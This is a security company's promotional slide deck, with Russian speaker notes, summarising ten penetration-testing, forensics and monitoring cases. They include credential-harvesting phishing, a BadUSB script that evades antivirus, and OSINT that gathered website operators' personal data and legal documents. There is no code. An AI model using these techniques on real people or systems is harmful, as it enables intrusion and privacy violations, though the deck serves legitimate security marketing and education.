  • 3. Advanced Monitoring Criminal Code of Russia. Article 272. Illegal Accessing of Computer Information. Criminal Code of Russia. Article 273. Creation, Use, and Dissemination of Harmful Computer Viruses Criminal Code of Russia. Article 274. Violation of Rules for the Operation of Computers, Computer Systems, or Their Networks vs We are the white hat hackers!
  • 4. Informational development and Communications ministry of the Perm Territory The Federal Service for State Registration, Cadastre and Cartography (Rosreestr) Khabarovsk Territory government JSC Russian Railways PJSC «Uralkali» etc. Customer List Advanced Monitoring
  • 5. Information Security Audit Software Security AuditPenetration testing Software development IS Incident Monitoring Digital Forensics Competitive Intelligence
  • 6. Our arsenal Network Scanners IP-Tools nmap Vulnerability Scanners MaxPatrol Nessus Traffic Analyzers Wireshark Intercepter-ng Ettercap-ng GigaStor Tcpdump Web Vulnerability Scanner Acunetix Burp Suite Nikto arachni sqlmap Exploit frameworks Metasploit Online bases: 0day.today rapid7.com exploit-db.com Static Analyzers PVS-Studio Cppcheck Clang SonarQUBE Disassemblers / Debuggers IDA OllyDbg WinDbg Immunity Debagger GDB Brute force software hydra John the Ripper hashcat Developer tools Visual Studio Eclipse IDLE
  • 7. Cases of the year Top 10
  • 8. Case 1/10 «Bad news» Client Government contractor Task and setting Perform a black box penetration testing Work done A spear phishing attack on client personnel was performed with two “news” letters about parking fees and pensions, containing web link to a script, that intercepted user authentication information
  • 9. Case 1/10 «Bad news» Results  More then a half of staff followed at least one of the links  Nobody reported suspicious letters to a client’s Information Security Department  Client’s IT-infrastructure has been fully compromised during the testing  Information Security Department activity has been logged and log was included in a final report
  • 10. Case 2/10 «Leaky front-end» Client Large governmental organization Task and setting Perform a server-client sales system information security audit Work done Client terminal reverse engineering, its web-interface instrumental examination, and also penetration testing and fuzzing of its server components have been performed
  • 11. Results  Fuzzing procedure that guaranteed server malfunction has been developed  A variety of vulnerabilities have been found in client software. Those vulnerabilities could allow an attacker to: o Tamper with the information on the client o Send modified data to the server o Clone client terminals Case 2/10 «Leaky front-end»
  • 12. Case 3/10 «Shakespearean tragedy» Client A theater Setting Leak of confidential financial information about directory salary It’s publication on the Internet Backlash from Client’s personnel Task Find the source of the leak and people responsible
  • 13. Case 3/10 «Shakespearean tragedy» Work done Leaked materials were analyzed and a list of potential malefactors was created Information on their computers was copied and examined Source data searched in the file archives and potential leakage paths were determined Results Leakage sources were determined and recommendations for their closure were made Client was given a list of suspects
  • 14. Case 4/10 «Blowing the lid off» Client Shipment tracking information provider Task and setting Some web-sites offered for sale information distributed by our Client without any legal ways to. The task was to find out how they get the information and if possible deanomize them Work done To complete the task an open source intelligence research was performed and sites of interest were analyzed instrumentally
  • 15. Case 4/10 «Blowing the lid off» Results The following information has been acquired:  The list of people affiliated with the web resources in question  Their personal and contact information, social relations, etc.  Confidential information, legal documents in particular
  • 16. Case 5/10 «Watchmen» Client Large IT-Company Task and setting A Client asked Advanced monitoring to develop a system of information security incident monitoring in his network and protocols for an on-the-spot incident response, and to create corresponding rules for the corporate intrusion detection system. Work done  Advanced Monitoring has established an Information Security Operation Center (AM ISOC)
  • 17.  AM ISOC has been integrated with Client’s network infrastructure and AM instrumental base (network scanners, traffic analyzers, etc)  Detection and response protocols have been established and tested in “combat environment” Results During a five months period:  29 information security incidents were detected and handled  34 signatures for Client IDS were developed Case 5/10 «Watchmen»
  • 18. Case 6/10 «The Star-Spangled Scare» Client Large IT-company Task and setting Investigate an incident taken place in client’s network Work done Monitoring of a Client’s network showed an attempt of a ShellShock attack. Client’s resources were not vulnerable to the attack and no harm was done. Attack analysis showed that an intruder had been sending queries in the search for vulnerable resources from San-Antonio, US.
  • 19. Connecting to a Command&Control server with the observation purpose showed that about 300 victims were successfully attacked and “zombified”. One of the infected IP-addresses turned out to belong to a Russian hosting provider «Radiosvyaz». Among the services hosted on that IP an e-mail server, operating a mail domain of a large regional generation company was found. As it turned out it was hacked by our intruder. Results Owners of a server were informed of the compartmentation of their web resource and it’s use as a part of a botnet. Case 6/10 «The Star-Spangled Scare»
  • 20. Client Electronic publisher Task and setting Perform a security audit of a client application of an e-book distribution platform. Check the possibility of book theft. Work done Within the framework of the project an Android, iOS and Windows 8.1 versions of a client application for e-book download and read were reverse engineered. Research also included checking for traffic interception possibilities for the risk of unauthorized access to a copyrighted material. Case 7/10 «Booky buccaneers»
  • 21. Case 7/10 «Booky buccaneers» Results  Three client application vulnerabilities were found and exploited  Unauthorized access to a distributed content and account data was gained  One server application vulnerability was found  Set of remedial measures for the vulnerabilities found and suggestions for the increase of the platform overall security were proposed
  • 22. Case 8/10 «USB maneuvers» Client A large industrial company Task and setting Industrial facility dealing with national security information turned to Advanced monitoring for planning and organizing information security maneuvers with “infected” USB-drives scattered on client’s premises and collecting information of their usage after their connection to a computer.
  • 23. Case 8/10 «USB maneuvers» Work done and results AM developed a USB-flash firmware suitable for a BadUSB attack that enabled an emulation of a two different devices after connecting that special firmware flash to a computer. After that in course of the attack a devise emulating a keyboard send a sequence of instructions that run a (undetectable by antivirus software) script on a victims machine. In current case potentially malicious script just sent information of the flash usage to a LAN server.
  • 24. Case 9/10 «Wireless mayhem» Client Large IT-company Task and setting Check Client’s office space in order to detect unauthorized Wi-Fi hotspots.
  • 25. Case 9/10 Work done A methodology of the use of laptop, Wi-Fi antenna and special software was created. Using this methodology Client’s office space was consistently examined. Wi-Fi signal map was build and all sources of the signal were found. Results Client’s office space of 30 rooms on two floors of the building was checked for hotspots. 10 legal and 25 illegal hotspots were found. «Wireless mayhem»
  • 26. Case 10/10 «AM — the Privacy Protector» Client Large IT-company Task and setting Check if Windows 10 really spy on users Make a list of recommendations to disable such functionality
  • 27. Case 10/10 «AM — the Privacy Protector» Work done and results Available recommendations were accumulated, checked (with Wireshark) and improved. A specialized tool for selective implementation of those recommendations was developed. Results An installation image with all recommendations applied was made and given to the Client The software developed was published openly: http://amonitoring.ru/cc/program/am-privacy- protector-w10/ And our experience and all the recommendations were also published: www.anti- malware.ru/analytics/Threats_Analysis/Windows_10_Threshold_2
  • 28. Thanks for your time! Maxim Avdyunin LLC Advanced Monitoring info@AMonitoring.ru

Editor's Notes

  1. • Сетевые сканеры • Сканеры уязвимостей • Анализаторы трафика • Сканер web-уязвимостей • Платформа для реализации уязвимостей • Статические анализаторы • Дизассемблеры / отладчики • Средства полного перебора • Средства разработки
  2. Client Government contractor Task and setting Провести тестирование на проникновение в режиме «чёрного ящика» Work done В рамках проекта была проведена фишинг-атака на компанию Заказчика, в ходе которой сотрудникам были отправлены 2 “новостных” письма, содержащих ссылки на скрипт, перехватывающий аутентификационные данные пользователей соответствующих машин
  3. Results Более половины сотрудников прошло хотя бы по одной ссылке Никто из них не сообщил об инциденте в службу ИБ Заказчика Исследователями был получен полный доступ к IT-инфраструктуре Заказчика Действия службы ИБ Заказчика протоколировались, протокол был включён в состав отчёта
  4. Client Крупная государственная организация Task and setting Провести проверку защищённости клиент-серверной системы продаж Work done В рамках проекта была проведена обратная разработка ПО клиентского терминала продаж и инструментальное исследование его web-интерфейса, а также тестирование на проникновение и фаззинг серверной части
  5. Results Была выработана методика фаззинга, позволяющая гарантированно вызывать сбои в работе сервера Был найден ряд уязвимостей в клиентском ПО, позволивших: Менять информацию на терминале Отправлять на сервер изменённые данные Клонировать терминалы
  6. Кто-то из сотрудников Заказчика передал третьим лицам информацию о заработной плате руководства театра, публикация которой привела к росту напряжённости среди персонала и негативной прессе. В силу специфики задачи работы проводились в предположении отсутствия доверенных лиц и наличия нескольких нарушителей. Задачей стало выяснить источник утечки и, в идеале, установить виновного.
  7. Work done В рамках проекта были проанализированы материалы утечки, составлен список потенциальных подозреваемых, созданы файловые архивы их АРМ, по которым проведён рекурсивный поиск исходной информации и сделаны предположения по возможным каналам утечки. Results По результатам работ были установлены источники информации, составившие утечку, сформирован список подозреваемых, предложены описания возможных каналов утечки и выработаны рекомендации по их ликвидации.
  8. Client Провайдер трекинговой информации о грузоперевозках Task and setting Ряд интернет-сайтов предлагает информацию, распространяемую Заказчиком, на продажу, очевидно, получая её в обход официальных каналов. Необходимо установить, каким образом это происходит Work done В рамках проекта были проведены работы по конкурентной разведке и инструментальному исследованию указанных заказчиком сайтов
  9. Results Были получены: Список аффилированных с исследуемыми сайтами лиц Их персональные данные, контактная информация, социальные связи и т.д. Конфиденциальные сведения, в частности, юридические документы
  10. Заказчик обратился к ЗАО «ПМ» с просьбой организовать мониторинг инцидентов ИБ в его сети, обеспечить реагирование на их возникновение и разработать соответствующие сигнатуры для корпоративной системы обнаружения вторжений
  11. Центр мониторинга был интегрирован с сетевой инфраструктурой Заказчика и инструментальными средствами анализа защищённости (в частности, сканерами безопасности) Разработаны и применены протоколы обнаружения и реагирования на инциденты ИБ Results За пять месяцев было: Выявлено и обработано 29 событий информационной безопасности Разработано 34 сигнатуры для IDS Заказчика
  12. Client Крупная IT-компания Task and setting Провести мониторинг сети заказчика Work done В ходе мониторинга сети компании специалистами ЦМ была обнаружена сетевая атака ShellShock. Ресурсы сети этой уязвимости не подвержены и не пострадали. Анализ атаки показал, что злоумышленник рассылал запросы в поисках уязвимых к атаке серверов с адреса в Сан-Антонио, США.
  13. Подключившись к C&C серверу для наблюдения за действиями злоумышленника, мы обнаружили более 300 жертв-ботов, управляемых им из разных стран мира. Один из заражённых IP-адресов оказался зарегистрирован за российским провай- дером ЗАО «Радиосвязь». Среди функционирующих на нём сервисов был обнаружен почтовый сервер, обслуживающий почтовый домен крупной региональной генерирующей компании, которая была взломана злоумышленником. Results Владельцы данного сервера были оповещены о компрометации их узла и использовании его в качестве составляющей бот-сети.
  14. По многочисленным сведениям, опубликованным в открытом доступе в интернете, переход на OS Windows 10 может быть чреват для пользователей проблемами с конфиденциальностью сведений, обрабатываемых в системе, и персональных данных её владельца. Задача предполагала сбор и проверку имеющейся информации по данному вопросу и разработку средства противодействия подозрительной активности OS Windows 10.
  15. Work done Имеющиеся в открытом доступе рекомендации были объединены, проверены (с помощью Wireshark) и дополнены специалистами ЗАО «ПМ», на их основании было разработано автоматизированное средство AM Privacy Protector for Windows 10, позволяюще избирательно отключать блокируемые механизмы ОС с сомнительным функционалом. Results Предложенные рекомендации были приняты заказчиком и применены для образов, используемых для развёртывания Windows 10 на новых АРМ. По результатам работ была подготовлена тематическая статья в СМИ: www.anti-malware.ru/analytics/Threats_Analysis/Windows_10_Threshold_2, а разработанное программное средство выложено в открытый доступ: http://amonitoring.ru/cc/program/am-privacy-protector-w10/